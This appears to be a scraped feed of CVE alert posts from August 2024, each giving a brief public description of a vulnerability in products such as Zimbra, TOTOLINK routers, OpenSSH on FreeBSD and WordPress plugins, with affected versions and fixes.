🚨 CVE-2024-33536An issue was discovered in Zimbra Collaboration (ZCS) 9.0 and 10.0. The vulnerability occurs due to inadequate input validation of the res parameter, allowing an authenticated attacker to inject and execute arbitrary JavaScript code within the context of another user's browser session. By uploading a malicious JavaScript file, accessible externally, and crafting a URL containing its location in the res parameter, the attacker can exploit this vulnerability. Subsequently, when another user visits the crafted URL, the malicious JavaScript code is executed.🎖@cveNotify |
|
| 2024-08-13 17:37:31 |
🚨 CVE-2024-27443An issue was discovered in Zimbra Collaboration (ZCS) 9.0 and 10.0. A Cross-Site Scripting (XSS) vulnerability exists in the CalendarInvite feature of the Zimbra webmail classic user interface, because of improper input validation in the handling of the calendar header. An attacker can exploit this via an email message containing a crafted calendar header with an embedded XSS payload. When a victim views this message in the Zimbra webmail classic interface, the payload is executed in the context of the victim's session, potentially leading to execution of arbitrary JavaScript code.🎖@cveNotify |
|
| 2024-08-13 17:37:30 |
🚨 CVE-2024-27442An issue was discovered in Zimbra Collaboration (ZCS) 9.0 and 10.0. The zmmailboxdmgr binary, a component of ZCS, is intended to be executed by the zimbra user with root privileges for specific mailbox operations. However, an attacker can escalate privileges from the zimbra user to root, because of improper handling of input arguments. An attacker can execute arbitrary commands with elevated privileges, leading to local privilege escalation.🎖@cveNotify |
|
| 2024-08-13 17:37:27 |
🚨 CVE-2024-21550SteVe is an open platform that implements different version of the OCPP protocol for Electric Vehicle charge points, acting as a central server for management of registered charge points. Attackers can inject arbitrary HTML and Javascript code via WebSockets leading to persistent Cross-Site Scripting in the SteVe management interface.🎖@cveNotify |
|
| 2024-08-13 17:37:26 |
🚨 CVE-2024-20419A vulnerability in the authentication system of Cisco Smart Software Manager On-Prem (SSM On-Prem) could allow an unauthenticated, remote attacker to change the password of any user, including administrative users. This vulnerability is due to improper implementation of the password-change process. An attacker could exploit this vulnerability by sending crafted HTTP requests to an affected device. A successful exploit could allow an attacker to access the web UI or API with the privileges of the compromised user.🎖@cveNotify |
|
| 2024-08-13 17:37:25 |
🚨 CVE-2024-1394A memory leak flaw was found in Golang in the RSA encrypting/decrypting code, which might lead to a resource exhaustion vulnerability using attacker-controlled inputs. The memory leak happens in github.com/golang-fips/openssl/openssl/rsa.go#L113. The objects leaked are pkey and ctx. That function uses named return parameters to free pkey and ctx if there is an error initializing the context or setting the different properties. All return statements related to error cases follow the "return nil, nil, fail(...)" pattern, meaning that pkey and ctx will be nil inside the deferred function that should free them.🎖@cveNotify |
|
| 2024-08-13 17:07:26 |
🚨 CVE-2024-7658A vulnerability, which was classified as problematic, has been found in projectsend up to r1605. This issue affects the function get_preview of the file process.php. The manipulation leads to improper control of resource identifiers. The attack may be initiated remotely. Upgrading to version r1720 is able to address this issue. The patch is named eb5a04774927e5855b9d0e5870a2aae5a3dc5a08. It is recommended to upgrade the affected component.🎖@cveNotify |
|
| 2024-08-13 17:07:25 |
🚨 CVE-2024-7589A signal handler in sshd(8) may call a logging function that is not async-signal-safe. The signal handler is invoked when a client does not authenticate within the LoginGraceTime seconds (120 by default). This signal handler executes in the context of the sshd(8)'s privileged code, which is not sandboxed and runs with full root privileges.This issue is another instance of the problem in CVE-2024-6387 addressed by FreeBSD-SA-24:04.openssh. The faulty code in this case is from the integration of blacklistd in OpenSSH in FreeBSD.As a result of calling functions that are not async-signal-safe in the privileged sshd(8) context, a race condition exists that a determined attacker may be able to exploit to allow an unauthenticated remote code execution as root.🎖@cveNotify |
|
| 2024-08-13 17:07:24 |
🚨 CVE-2024-7557A vulnerability was found in OpenShift AI that allows for authentication bypass and privilege escalation across models within the same namespace. When deploying AI models, the UI provides the option to protect models with authentication. However, credentials from one model can be used to access other models and APIs within the same namespace. The exposed ServiceAccount tokens, visible in the UI, can be utilized with oc --token={token} to exploit the elevated view privileges associated with the ServiceAccount, leading to unauthorized access to additional resources.🎖@cveNotify |
|
| 2024-08-13 16:37:35 |
🚨 CVE-2024-21757A unverified password change in Fortinet FortiManager versions 7.0.0 through 7.0.10, versions 7.2.0 through 7.2.4, and versions 7.4.0 through 7.4.1, as well as Fortinet FortiAnalyzer versions 7.0.0 through 7.0.10, versions 7.2.0 through 7.2.4, and versions 7.4.0 through 7.4.1, allows an attacker to modify admin passwords via the device configuration backup.🎖@cveNotify |
|
| 2024-08-13 16:37:31 |
🚨 CVE-2022-45862An insufficient session expiration vulnerability [CWE-613] vulnerability in FortiOS 7.2.5 and below, 7.0 all versions, 6.4 all versions; FortiProxy 7.2 all versions, 7.0 all versions; FortiPAM 1.3 all versions, 1.2 all versions, 1.1 all versions, 1.0 all versions; FortiSwitchManager 7.2.1 and below, 7.0 all versions GUI may allow attackers to re-use websessions after GUI logout, should they manage to acquire the required credentials.🎖@cveNotify |
|
| 2024-08-13 16:37:30 |
🚨 CVE-2024-42736In TOTOLINK X5000r v9.1.0cu.2350_b20230313, the file /cgi-bin/cstecgi.cgi contains an OS command injection vulnerability in addBlacklist. Authenticated Attackers can send malicious packet to execute arbitrary commands.🎖@cveNotify |
|
| 2024-08-13 16:37:29 |
🚨 CVE-2023-31315Improper validation in a model specific register (MSR) could allow a malicious program with ring0 access to modify SMM configuration while SMI lock is enabled, potentially leading to arbitrary code execution.🎖@cveNotify |
|
| 2024-08-13 16:37:26 |
🚨 CVE-2024-7274A vulnerability, which was classified as critical, has been found in itsourcecode Alton Management System 1.0. This issue affects some unknown processing of the file /reservation_status.php. The manipulation of the argument rcode leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-273143.🎖@cveNotify |
|
| 2024-08-13 16:37:25 |
🚨 CVE-2024-4603Issue summary: Checking excessively long DSA keys or parameters may be veryslow.Impact summary: Applications that use the functions EVP_PKEY_param_check()or EVP_PKEY_public_check() to check a DSA public key or DSA parameters mayexperience long delays. Where the key or parameters that are being checkedhave been obtained from an untrusted source this may lead to a Denial ofService.The functions EVP_PKEY_param_check() or EVP_PKEY_public_check() performvarious checks on DSA parameters. Some of those computations take a long timeif the modulus (`p` parameter) is too large.Trying to use a very large modulus is slow and OpenSSL will not allow usingpublic keys with a modulus which is over 10,000 bits in length for signatureverification. However the key and parameter check functions do not limitthe modulus size when performing the checks.An application that calls EVP_PKEY_param_check() or EVP_PKEY_public_check()and supplies a key or parameters obtained from an untrusted source could bevulnerable to a Denial of Service attack.These functions are not called by OpenSSL itself on untrusted DSA keys soonly applications that directly call these functions may be vulnerable.Also vulnerable are the OpenSSL pkey and pkeyparam command line applicationswhen using the `-check` option.The OpenSSL SSL/TLS implementation is not affected by this issue.The OpenSSL 3.0 and 3.1 FIPS providers are affected by this issue.🎖@cveNotify |
|
| 2024-08-13 16:37:24 |
🚨 CVE-2024-30589Tenda FH1202 v1.2.0.14(408) firmware has a stack overflow vulnerability in the entrys parameter of the fromAddressNat function.🎖@cveNotify |
|
| 2024-08-13 16:07:24 |
🚨 CVE-2024-7408This vulnerability exists in Airveda Air Quality Monitor PM2.5 PM10 due to transmission of sensitive information in plain text during AP pairing mode. An attacker in close proximity could exploit this vulnerability by capturing Wi-Fi traffic of Airveda-AP.Successful exploitation of this vulnerability could allow the attacker to cause Evil Twin attack on the targeted system.🎖@cveNotify |
|
| 2024-08-13 15:37:42 |
🚨 CVE-2024-42630FrogCMS v0.9.5 was discovered to contain a Cross-Site Request Forgery (CSRF) vulnerability via /admin/?/plugin/file_manager/create_file.🎖@cveNotify |
|
| 2024-08-13 15:37:41 |
🚨 CVE-2024-7399Improper limitation of a pathname to a restricted directory vulnerability in Samsung MagicINFO 9 Server version before 21.1050 allows attackers to write arbitrary file as system authority.🎖@cveNotify |
|
| 2024-08-13 15:37:37 |
🚨 CVE-2024-7006A null pointer dereference flaw was found in Libtiff via `tif_dirinfo.c`. This issue may allow an attacker to trigger memory allocation failures through certain means, such as restricting the heap space size or injecting faults, causing a segmentation fault. This can cause an application crash, eventually leading to a denial of service.🎖@cveNotify |
|
| 2024-08-13 15:37:36 |
🚨 CVE-2024-6759When mounting a remote filesystem using NFS, the kernel did not sanitize remotely provided filenames for the path separator character, "/". This allows readdir(3) and related functions to return filesystem entries with names containing additional path components.The lack of validation described above gives rise to a confused deputy problem. For example, a program copying files from an NFS mount could be tricked into copying from outside the intended source directory, and/or to a location outside the intended destination directory.🎖@cveNotify |
|
| 2024-08-13 15:37:35 |
🚨 CVE-2024-6158The Category Posts Widget WordPress plugin before 4.9.17, term-and-category-based-posts-widget WordPress plugin before 4.9.13 does not validate and escape some of its "Category Posts" widget settings before outputting them back in a page/post where the Widget is embed, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)🎖@cveNotify |
|
| 2024-08-13 15:37:32 |
🚨 CVE-2024-41240A Reflected Cross Site Scripting (XSS) vulnerability was found in " /smsa/teacher_login.php" in Kashipara Responsive School Management System v3.2.0, which allows remote attackers to execute arbitrary code via the "error" parameter.🎖@cveNotify |
|
| 2024-08-13 15:37:31 |
🚨 CVE-2022-4003A denial-of-service vulnerability could allow an authenticated user to trigger an internal service restart via a specially crafted API request.🎖@cveNotify |
|
| 2024-08-13 15:37:30 |
🚨 CVE-2019-6198A vulnerability was reported in Lenovo PC Manager prior to version 2.8.90.11211 that could allow a local attacker to escalate privileges.🎖@cveNotify |
|
| 2024-08-13 15:37:26 |
🚨 CVE-2024-37635TOTOLINK A3700R V9.1.2u.6165_20211012 was discovered to contain a stack overflow via ssid in the function setWiFiBasicCfg🎖@cveNotify |
|
| 2024-08-13 15:37:25 |
🚨 CVE-2024-30622Tenda FH1205 v2.0.0.7(775) has a stack overflow vulnerability in the mitInterface parameter from fromAddressNat function.🎖@cveNotify |
|
| 2024-08-13 15:07:35 |
🚨 CVE-2024-41482Typora before 1.9.3 Markdown editor has a cross-site scripting (XSS) vulnerability via the MathJax component.🎖@cveNotify |
|
| 2024-08-13 15:07:32 |
🚨 CVE-2024-41481Typora before 1.9.3 Markdown editor has a cross-site scripting (XSS) vulnerability via the Mermaid component.🎖@cveNotify |
|
| 2024-08-13 15:07:31 |
🚨 CVE-2017-3772A vulnerability was reported in Lenovo PC Manager versions prior to 2.6.40.3154 that could allow an attacker to cause a system reboot.🎖@cveNotify |
|
| 2024-08-13 15:07:30 |
🚨 CVE-2024-7310A vulnerability was found in SourceCodester Record Management System 1.0. It has been declared as problematic. This vulnerability affects unknown code of the file sort_user.php. The manipulation of the argument sort leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-273202 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-08-13 15:07:26 |
🚨 CVE-2024-7308A vulnerability was found in SourceCodester Establishment Billing Management System 1.0 and classified as critical. Affected by this issue is some unknown functionality of the file /view_bill.php. The manipulation of the argument id leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-273200.🎖@cveNotify |
|
| 2024-08-13 15:07:25 |
🚨 CVE-2024-7290A vulnerability classified as critical has been found in SourceCodester Establishment Billing Management System 1.0. This affects an unknown part of the file /manage_tenant.php. The manipulation of the argument id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-273159.🎖@cveNotify |
|
| 2024-08-13 15:07:24 |
🚨 CVE-2024-7289A vulnerability was found in SourceCodester Establishment Billing Management System 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file /manage_payment.php. The manipulation of the argument id leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-273158 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-08-13 14:37:44 |
🚨 CVE-2024-42736In TOTOLINK X5000r v9.1.0cu.2350_b20230313, the file /cgi-bin/cstecgi.cgi contains an OS command injection vulnerability in addBlacklist. Authenticated Attackers can send malicious packet to execute arbitrary commands.🎖@cveNotify |
|
| 2024-08-13 14:37:43 |
🚨 CVE-2024-42745In TOTOLINK X5000r v9.1.0cu.2350_b20230313, the file /cgi-bin/cstecgi.cgi contains an OS command injection vulnerability in setUPnPCfg. Authenticated Attackers can send malicious packet to execute arbitrary commands.🎖@cveNotify |
|
| 2024-08-13 14:37:42 |
🚨 CVE-2024-42744In TOTOLINK X5000r v9.1.0cu.2350_b20230313, the file /cgi-bin/cstecgi.cgi contains an OS command injection vulnerability in setModifyVpnUser. Authenticated Attackers can send malicious packet to execute arbitrary commands.🎖@cveNotify |
|
| 2024-08-13 14:37:38 |
🚨 CVE-2024-42741In TOTOLINK X5000r v9.1.0cu.2350_b20230313, the file /cgi-bin/cstecgi.cgi contains an OS command injection vulnerability in setL2tpServerCfg. Authenticated Attackers can send malicious packet to execute arbitrary commands.🎖@cveNotify |
|
| 2024-08-13 14:07:26 |
🚨 CVE-2024-7120A vulnerability, which was classified as critical, was found in Raisecom MSG1200, MSG2100E, MSG2200 and MSG2300 3.90. This affects an unknown part of the file list_base_config.php of the component Web Interface. The manipulation of the argument template leads to os command injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-272451.🎖@cveNotify |
|
| 2024-08-13 14:07:25 |
🚨 CVE-2024-6558HMS Industrial NetworksAnybus-CompactCom 30 products are vulnerable to a XSS attack caused by the lack of input sanitation checks. As a consequence, it is possible to insert HTML code into input fields and store the HTML code. The stored HTML code will be embedded in the page and executed by host browser the next time the page is loaded, enabling social engineering attacks.🎖@cveNotify |
|
| 2024-08-13 14:07:24 |
🚨 CVE-2024-41808The OpenObserve open-source observability platform provides the ability to filter logs in a dashboard by the values uploaded in a given log. However, all versions of the platform through 0.9.1 do not sanitize user input in the filter selection menu, which may result in complete account takeover. It has been noted that the front-end uses `DOMPurify` or Vue templating to escape cross-site scripting (XSS) extensively, however certain areas of the front end lack this XSS protection. When combining the missing protection with the insecure authentication handling that the front-end uses, a malicious user may be able to take over any victim's account provided they meet the exploitation steps. As of time of publication, no patched version is available.🎖@cveNotify |
|
| 2024-08-13 13:37:41 |
🚨 CVE-2024-3913An unauthenticated remote attacker can use this vulnerability to change the device configuration due to a file writeable for short time after system startup.🎖@cveNotify |
|
| 2024-08-13 13:37:40 |
🚨 CVE-2024-38502An unauthenticated remote attacker may use stored XSS vulnerability to obtain information from a user or reboot the affected device once.🎖@cveNotify |
|
| 2024-08-13 13:37:37 |
🚨 CVE-2024-38501An unauthenticated remote attacker may use a HTML injection vulnerability with limited length to inject malicious HTML code and gain low-privileged access on the affected device.🎖@cveNotify |
|
| 2024-08-13 13:37:36 |
🚨 CVE-2024-42543TOTOLINK A3700R v9.1.2u.5822_B20200513 has a buffer overflow vulnerability in the http_host parameter in the loginauth function.🎖@cveNotify |
|
| 2024-08-13 13:37:35 |
🚨 CVE-2024-42626FrogCMS v0.9.5 was discovered to contain a Cross-Site Request Forgery (CSRF) vulnerability via /admin/?/snippet/add.🎖@cveNotify |
|
| 2024-08-13 13:37:31 |
🚨 CVE-2024-42632FrogCMS v0.9.5 was discovered to contain a Cross-Site Request Forgery (CSRF) vulnerability via /admin/?/page/add.🎖@cveNotify |
|
| 2024-08-13 13:37:30 |
🚨 CVE-2024-42630FrogCMS v0.9.5 was discovered to contain a Cross-Site Request Forgery (CSRF) vulnerability via /admin/?/plugin/file_manager/create_file.🎖@cveNotify |
|
| 2024-08-13 13:37:26 |
🚨 CVE-2024-42520TOTOLINK A3002R v4.0.0-B20230531.1404 contains a buffer overflow vulnerability in /bin/boa via formParentControl.🎖@cveNotify |
|
| 2024-08-13 13:07:42 |
🚨 CVE-2024-42747In TOTOLINK X5000r v9.1.0cu.2350_b20230313, the file /cgi-bin/cstecgi.cgi contains an OS command injection vulnerability in setWanIeCfg. Authenticated Attackers can send malicious packet to execute arbitrary commands.🎖@cveNotify |
|
| 2024-08-13 13:07:41 |
🚨 CVE-2024-42743In TOTOLINK X5000r v9.1.0cu.2350_b20230313, the file /cgi-bin/cstecgi.cgi contains an OS command injection vulnerability in setSyslogCfg . Authenicated Attackers can send malicious packet to execute arbitary commands.🎖@cveNotify |
|
| 2024-08-13 13:07:37 |
🚨 CVE-2024-42742In TOTOLINK X5000r v9.1.0cu.2350_b20230313, the file /cgi-bin/cstecgi.cgi contains an OS command injection vulnerability in setUrlFilterRules. Authenicated Attackers can send malicious packet to execute arbitary commands.🎖@cveNotify |
|
| 2024-08-13 13:07:36 |
🚨 CVE-2023-41884ZoneMinder is a free, open source Closed-circuit television software application. In WWW/AJAX/watch.php, Line: 51 takes a few parameter in sql query without sanitizing it which makes it vulnerable to sql injection. This vulnerability is fixed in 1.36.34.🎖@cveNotify |
|
| 2024-08-13 13:07:35 |
🚨 CVE-2024-6768A Denial of Service in CLFS.sys in Microsoft Windows 10, Windows 11, Windows Server 2016, Windows Server 2019, and Windows Server 2022 allows a malicious authenticated low-privilege user to cause a Blue Screen of Death via a forced call to the KeBugCheckEx function.🎖@cveNotify |
|
| 2024-08-13 13:07:32 |
🚨 CVE-2024-42547TOTOLINK A3100R V4.1.2cu.5050_B20200504 has a buffer overflow vulnerability in the http_host parameter in the loginauth function.🎖@cveNotify |
|
| 2024-08-13 13:07:31 |
🚨 CVE-2024-40893Multiple authenticated operating system (OS) command injection vulnerabilities exist in Firewalla Box Software versions before 1.979. A physically close attacker that is authenticated to the Bluetooth Low-Energy (BTLE) interface can use the network configuration service to inject commands in various configuration parameters including networkConfig.Interface.Phy.Eth0.Extra.PingTestIP, networkConfig.Interface.Phy.Eth0.Extra.DNSTestDomain, and networkConfig.Interface.Phy.Eth0.Gateway6. Additionally, because the configuration can be synced to the Firewalla cloud, the attacker may be able to persist access even after hardware resets and firmware re-flashes.🎖@cveNotify |
|
| 2024-08-13 13:07:30 |
🚨 CVE-2024-40892A weak credential vulnerability exists in Firewalla Box Software versions before 1.979. This vulnerability allows a physically close attacker to use the license UUID for authentication and provision SSH credentials over the Bluetooth Low-Energy (BTLE) interface. Once an attacker gains access to the LAN, they could log into the SSH interface using the provisioned credentials. The license UUID can be acquired through plain-text Bluetooth sniffing, reading the QR code on the bottom of the device, or brute-forcing the UUID (though this is less likely).🎖@cveNotify |
|
| 2024-08-13 13:07:27 |
🚨 CVE-2024-41913A vulnerability was discovered in the firmware builds up to 10.10.2.2 in Poly Clariti Manager devices. The firmware flaw does not properly sanitize User input.🎖@cveNotify |
|
| 2024-08-13 13:07:26 |
🚨 CVE-2024-41910A vulnerability was discovered in the firmware builds up to 10.10.2.2 in Poly Clariti Manager devices. The firmware contained multiple XSS vulnerabilities in the version of JavaScript used.🎖@cveNotify |
|
| 2024-08-13 13:07:25 |
🚨 CVE-2022-35918Streamlit is a data oriented application development framework for python. Users hosting Streamlit app(s) that use custom components are vulnerable to a directory traversal attack that could leak data from their web server file-system such as: server logs, world readable files, and potentially other sensitive information. An attacker can craft a malicious URL with file paths and the streamlit server would process that URL and return the contents of that file. This issue has been resolved in version 1.11.1. Users are advised to upgrade. There are no known workarounds for this issue.🎖@cveNotify |
|
| 2024-08-13 11:37:42 |
🚨 CVE-2024-43135Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in Themewinter WPCafe allows PHP Local File Inclusion.This issue affects WPCafe: from n/a through 2.2.28.🎖@cveNotify |
|
| 2024-08-13 11:37:41 |
🚨 CVE-2024-43128Improper Control of Generation of Code ('Code Injection') vulnerability in WC Product Table WooCommerce Product Table Lite allows Code Injection.This issue affects WooCommerce Product Table Lite: from n/a through 3.5.1.🎖@cveNotify |
|
| 2024-08-13 11:37:37 |
🚨 CVE-2024-43121Improper Privilege Management vulnerability in realmag777 HUSKY allows Privilege Escalation.This issue affects HUSKY: from n/a through 1.3.6.1.🎖@cveNotify |
|
| 2024-08-13 11:37:36 |
🚨 CVE-2024-39651Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in WPWeb WooCommerce PDF Vouchers allows File Manipulation.This issue affects WooCommerce PDF Vouchers: from n/a before 4.9.5.🎖@cveNotify |
|
| 2024-08-13 11:37:35 |
🚨 CVE-2024-39642Authorization Bypass Through User-Controlled Key vulnerability in ThimPress LearnPress allows Accessing Functionality Not Properly Constrained by ACLs.This issue affects LearnPress: from n/a through 4.2.6.8.2.🎖@cveNotify |
|
| 2024-08-13 11:37:31 |
🚨 CVE-2024-38760Exposure of Sensitive Information to an Unauthorized Actor vulnerability in David Maucher Send Users Email allows Accessing Functionality Not Properly Constrained by ACLs.This issue affects Send Users Email: from n/a through 1.5.1.🎖@cveNotify |
|
| 2024-08-13 11:37:30 |
🚨 CVE-2024-38749Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Olive Themes Olive One Click Demo Import allows Accessing Functionality Not Properly Constrained by ACLs.This issue affects Olive One Click Demo Import: from n/a through 1.1.2.🎖@cveNotify |
|
| 2024-08-13 11:37:26 |
🚨 CVE-2024-38742Exposure of Sensitive Information to an Unauthorized Actor vulnerability in MBE Worldwide S.P.A. MBE eShip allows Accessing Functionality Not Properly Constrained by ACLs.This issue affects MBE eShip: from n/a through 2.1.2.🎖@cveNotify |
|
| 2024-08-13 11:37:25 |
🚨 CVE-2024-38699Missing Authorization vulnerability in WP Swings Wallet System for WooCommerce allows Accessing Functionality Not Properly Constrained by ACLs.This issue affects Wallet System for WooCommerce: from n/a through 2.5.13.🎖@cveNotify |
|
| 2024-08-13 11:37:24 |
🚨 CVE-2024-2259This vulnerability exists in InstaRISPACS software due to insufficient validation of user supplied input for the loginTo parameter in user login module of the web interface of the application. A remote attacker could exploit this vulnerability by sending a specially crafted input to the vulnerable parameter to perform reflected Cross Site Scripting (XSS) attacks on the targeted system.🎖@cveNotify |
|
| 2024-08-13 10:37:25 |
🚨 CVE-2024-38688Missing Authorization vulnerability in Igor Benić Recipe Maker For Your Food Blog from Zip Recipes allows Accessing Functionality Not Properly Constrained by ACLs.This issue affects Recipe Maker For Your Food Blog from Zip Recipes: from n/a through 8.2.6.🎖@cveNotify |
|
| 2024-08-13 10:37:24 |
🚨 CVE-2024-37935Missing Authorization vulnerability in anhvnit Woocommerce OpenPos allows Accessing Functionality Not Properly Constrained by ACLs.This issue affects Woocommerce OpenPos: from n/a through 6.4.4.🎖@cveNotify |
|
| 2024-08-13 09:37:24 |
🚨 CVE-2023-38522Apache Traffic Server accepts characters that are not allowed for HTTP field names and forwards malformed requests to origin servers. This can be utilized for request smuggling and may also lead cache poisoning if the origin servers are vulnerable.This issue affects Apache Traffic Server: from 8.0.0 through 8.1.10, from 9.0.0 through 9.2.4.Users are recommended to upgrade to version 8.1.11 or 9.2.5, which fixes the issue.🎖@cveNotify |
|
| 2024-08-13 08:37:25 |
🚨 CVE-2022-46143Affected devices do not check the TFTP blocksize correctly. This could allow an authenticated attacker to read from an uninitialized buffer that potentially contains previously allocated data.🎖@cveNotify |
|
| 2024-08-13 07:37:24 |
🚨 CVE-2024-7715** UNSUPPORTED WHEN ASSIGNED ** A vulnerability was found in D-Link DNS-120, DNR-202L, DNS-315L, DNS-320, DNS-320L, DNS-320LW, DNS-321, DNR-322L, DNS-323, DNS-325, DNS-326, DNS-327L, DNR-326, DNS-340L, DNS-343, DNS-345, DNS-726-4, DNS-1100-4, DNS-1200-05 and DNS-1550-04 up to 20240812. It has been classified as critical. This affects the function sprintf of the file /cgi-bin/photocenter_mgr.cgi. The manipulation of the argument filter leads to command injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. NOTE: Vendor was contacted early and confirmed that the product is end-of-life. It should be retired and replaced.🎖@cveNotify |
|
| 2024-08-13 06:37:25 |
🚨 CVE-2024-6823The Media Library Assistant plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation involving the mla-inline-edit-upload-scripts AJAX action in all versions up to, and including, 3.18. This makes it possible for authenticated attackers, with Author-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible.🎖@cveNotify |
|
| 2024-08-13 06:37:24 |
🚨 CVE-2024-6724The Generate Images WordPress plugin before 5.2.8 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)🎖@cveNotify |
|
| 2024-08-13 05:37:25 |
🚨 CVE-2024-41734Due to missing authorization check in SAP NetWeaver Application Server ABAP and ABAP Platform, an authenticated attacker could call an underlying transaction, which leads to disclosure of user related information. There is no impact on integrity or availability.🎖@cveNotify |
|
| 2024-08-13 05:37:24 |
🚨 CVE-2024-39591SAP Document Builder does not perform necessary authorization checks for one of the function modules resulting in escalation of privileges causing low impact on confidentiality of the application.🎖@cveNotify |
|
| 2024-08-13 04:37:33 |
🚨 CVE-2024-41732SAP NetWeaver Application Server ABAP allows an unauthenticated attacker to craft a URL link that could bypass allowlist controls. Depending on the web applications provided by this server, the attacker might inject CSS code or links into the web application that could allow the attacker to read or modify information. There is no impact on availability of application.🎖@cveNotify |
|
| 2024-08-13 04:37:26 |
🚨 CVE-2024-41731SAP BusinessObjects Business IntelligencePlatform allows an authenticated attacker to upload malicious code over thenetwork, that could be executed by the application. On successful exploitation,the attacker can cause a low impact on the Integrity of the application.🎖@cveNotify |
|
| 2024-08-13 04:37:25 |
🚨 CVE-2024-33003Some OCC API endpoints in SAP Commerce Cloudallows Personally Identifiable Information (PII) data, such as passwords, emailaddresses, mobile numbers, coupon codes, and voucher codes, to be included inthe request URL as query or path parameters. On successful exploitation, thiscould lead to a High impact on confidentiality and integrity of theapplication.🎖@cveNotify |
|
| 2024-08-13 04:37:24 |
🚨 CVE-2024-28166SAP BusinessObjects Business Intelligence Platform allows an authenticated attacker to upload malicious code over the network, that could be executed by the application. On successful exploitation, the attacker can cause a low impact on the Integrity of the application.🎖@cveNotify |
|
| 2024-08-13 03:37:25 |
🚨 CVE-2024-7388The WP Bannerize Pro plugin for WordPress is vulnerable to Stored Cross-Site Scripting via banner alt data in all versions up to, and including, 1.9.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with editor-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.🎖@cveNotify |
|
| 2024-08-13 03:37:24 |
🚨 CVE-2024-7094The JS Help Desk – The Ultimate Help Desk & Support Plugin plugin for WordPress is vulnerable to PHP Code Injection leading to Remote Code Execution in all versions up to, and including, 2.8.6 via the 'storeTheme' function. This is due to a lack of sanitization on user-supplied values, which replace values in the style.php file, along with missing capability checks. This makes it possible for unauthenticated attackers to execute code on the server. This issue was partially patched in 2.8.6 when the code injection issue was resolved, and fully patched in 2.8.7 when the missing authorization and cross-site request forgery protection was added.🎖@cveNotify |
|
| 2024-08-13 02:37:24 |
🚨 CVE-2022-38382IBM Cloud Pak for Security (CP4S) 1.10.0.0 through 1.10.11.0 and IBM QRadar Suite Software 1.10.12.0 through 1.10.23.0 does not invalidate session after logout which could allow another user to obtain sensitive information. IBM X-Force ID: 233672.🎖@cveNotify |
|
| 2024-08-13 01:37:32 |
🚨 CVE-2024-40475SourceCodester Best House Rental Management System v1.0 is vulnerable to Incorrect Access Control via /rental/payment_report.php, /rental/balance_report.php, /rental/invoices.php, /rental/tenants.php, and /rental/users.php.🎖@cveNotify |
|
| 2024-08-13 01:37:26 |
🚨 CVE-2024-40474A Reflected Cross Site Scripting (XSS) vulnerability was found in "edit-cate.php" in SourceCodester House Rental Management System v1.0.🎖@cveNotify |
|
| 2024-08-13 01:37:25 |
🚨 CVE-2024-39949A vulnerability has been found in Dahua products. Attackers can send carefully crafted data packets to the interface with vulnerabilities, causing the device to crash.🎖@cveNotify |
|
| 2024-08-13 01:37:24 |
🚨 CVE-2024-37742Insecure Access Control in Safe Exam Browser (SEB) = 3.5.0 on Windows. The vulnerability allows an attacker to share clipboard data between the SEB kiosk mode and the underlying system, compromising exam integrity. By exploiting this flaw, an attacker can bypass exam controls and gain an unfair advantage during exams.🎖@cveNotify |
|
| 2024-08-13 01:07:29 |
🚨 CVE-2024-21147Vulnerability in the Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Hotspot). Supported versions that are affected are Oracle Java SE: 8u411, 8u411-perf, 11.0.23, 17.0.11, 21.0.3, 22.0.1; Oracle GraalVM for JDK: 17.0.11, 21.0.3, 22.0.1; Oracle GraalVM Enterprise Edition: 20.3.14 and 21.3.10. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition accessible data as well as unauthorized access to critical data or complete access to all Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability can be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. This vulnerability also applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. CVSS 3.1 Base Score 7.4 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N).🎖@cveNotify |
|
| 2024-08-12 23:37:32 |
🚨 CVE-2024-43125Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in WP Table Builder WP Table Builder – WordPress Table Plugin allows Stored XSS.This issue affects WP Table Builder – WordPress Table Plugin: from n/a through 1.4.15.🎖@cveNotify |
|
| 2024-08-12 23:37:26 |
